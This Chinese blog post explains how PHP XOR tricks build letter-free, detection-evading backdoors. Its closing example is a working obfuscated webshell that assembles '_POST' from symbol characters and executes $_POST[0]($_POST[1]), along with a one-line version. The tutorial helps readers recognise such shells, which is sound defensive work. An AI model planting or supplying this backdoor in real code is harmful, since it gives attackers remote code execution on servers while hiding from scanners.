变态的PHP后门

变态的PHP后门
在查看此篇文章,必须先了解下PHP中异或(^)的概念。对于异或,异或在这种非字母数字的PHP后门中经常使用并且非常重要。
在查看此篇文章,必须先了解下PHP中异或(^)的概念。对于异或,异或在这种非字母数字的PHP后门中经常使用并且非常重要。
先看如下代码:
<?php
    echo "A" ^ "}";
?>

运行这段代码,那么输出的结果是字符"<",之所以会得到这样的结果,是因为代码中对字符"A"和字符"}"进行了异或操作。在PHP中,两个变量 进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。异或操作有时也被用来交换两个变量的值。
我们都知道,PHP是弱类型的语言,也就是说在PHP中我们可以不预先声明变量的类型,而直接声明一个变量并进行初始化或赋值操作。正是由于PHP弱类型 的这个特点,我们对PHP的变类型进行隐式的转换,并利用这个特点进行一些非常规的操作。如将整型转换成字符串型,将布尔型当作整型,或者将字符串当作函数来处理。

再看如下例子:

<?php
    $_++;
    $__="<"^"}";
    $__("stuff");
 ?>
(1)$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。
(2)$__="<"^"}";对字符"<"和"}"进行异或运算,得到结果A赋给变量名为"__"(两个下划线)的变量
(3)$__("stuff");通过上面的赋值操作,变量$__的值为A,所以这行可以看作是A("stuff"),在PHP中,这行代码表示调用函数 A,但是由于程序中并未定义函数A,所以这行代码会抛出一个致命错误使程序停止运行。这行代码没什么实际的意义,但是它能简单体现出在PHP中,我们可以 将字符串当作函数来处理。
到此,大家如果再看到类似的PHP后门应该不会那么迷惑了,
上面的那段示例代码最后会出错,导致程序停止运行,当然写出一个出错的程序并不是我们的目的,使用这种后门的主要目的是创建一些可以绕过检测的并且对我们 有用的字符串,如_POST", "system", "call_user_func_array",或者是任何我们需要的东西。
再看下面代码:
<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
 ?>
我们甚至可以将上面的代码合并为一行,从而使程序的可读性更差,代码如下:
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");

版权属于:够过瘾——挨踢男的葵花宝典

文章链接:http://www.gouguoyin.cn/php/110.html

转载时必须以链接形式注明原始出处及本声明。

如果您觉得本文对您有所帮助,请小额赞助一下,我会优先回答您在使用过程中出现的问题,点此赞助

如有疑问或遇到技术问题,请加官方QQ群: 421537504   GoCMS官方交流群

文章点评:

表情

1条评论

  • waterfdp 2年前
    学习